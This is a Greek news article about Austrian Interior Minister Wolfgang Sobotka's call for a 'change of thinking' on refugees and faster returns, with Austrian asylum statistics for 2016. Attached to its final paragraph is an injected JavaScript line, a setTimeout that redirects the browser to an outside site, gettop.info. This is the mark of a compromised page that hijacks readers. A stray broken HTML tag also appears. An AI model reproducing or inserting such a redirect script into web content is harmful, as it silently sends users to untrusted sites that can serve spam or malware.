Σομπότκα: «Αλλαγή σκέψης» στο προσφυγικό – Προϋποθέσεις για ταχεία επαναπροώθηση

0
3

 

Σε δηλώσεις του στη γερμανική εφημερίδα Die Welt, ο Αυστριακός υπουργός Εσωτερικών Βόλφγκανγκ Σομπότκα ζήτησε να υπάρξει «αλλαγή σκέψης» στην προσφυγική κρίση και προϋποθέσεις για ταχεία επαναπροώθηση τονίζοντας πως όσο η θαλάσσια διάσωση θα ισοδυναμεί με πρόσβαση στην Ευρώπη, δεν πρόκειται να σταματήσει η εισροή ανθρώπων στην Ελλάδα και την Ιταλία.

«Εχουμε εδώ την παράδοξη κατάσταση, άνθρωποι που δεν έχουν λόγο για να τους χορηγηθεί άσυλο, να μην μπορούν να επαναπροωθηθούν στις χώρες προέλευσης τους. Χρειάζεται μία σαφής αλλαγή σκέψης, καθώς και προϋποθέσεις για ταχεία επαναπροώθηση«, τόνισε ο Βόλφγκανγκ Σομπότκα.

em>η επέκταση της ευρωπαϊκής υπηρεσίας συνοριοφυλακής και ακτοφυλακής Frontex είναι «ένα καλό βήμα προς τη σωστή κατεύθυνση», όμως θα πρέπει να ακολουθήσουν και άλλα περαιτέρω βήματα για να μπορούν να προστατευθούν τα εξωτερικά σύνορα της Ευρωπαϊκής Ενωσης όπως είπε ο Αυστριακός ΥΠΕΣ.

Σύμφωνα με την έκθεση από το αυστριακό υπουργείο Εσωτερικών έως το τέλος Σεπτεμβρίου είχαν υποβληθεί 34.657 αιτήσεις για άσυλο στην Αυστρία, ωστόσο καθοριστικός για το ανώτατο όριο χορήγησης ασύλου, το οποίο το 2016 ανέρχεται σε 37.500, είναι ο αριθμός των αιτήσεων που έγιναν δεκτές και αυτές ανέρχονταν σε 28.298, υπολείπονται δηλαδή κατά περισσότερες από 9.000 έως το τέλος της χρονιάς.

Στον αριθμό αυτό περιλαμβάνονται και 8.603 αιτήσεις ασύλου που έχουν μεταφερθεί από την περασμένη χρονιά, ούτως ώστε να υπάρχει αρκετή ακόμη απόσταση από το ανώτατο όριο των 37.500, ενώ, όπως διαπιστώνεται από τα στοιχεία του υπουργείου Εσωτερικών, εφέτος έχουν εγκαταλείψει τη χώρα 7.826 πρόσφυγες, και ως εκ τούτου μέχρι τέλη Σεπτεμβρίου το ανώτατο αυτό όριο έχει καλυφθεί κατά 75%. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here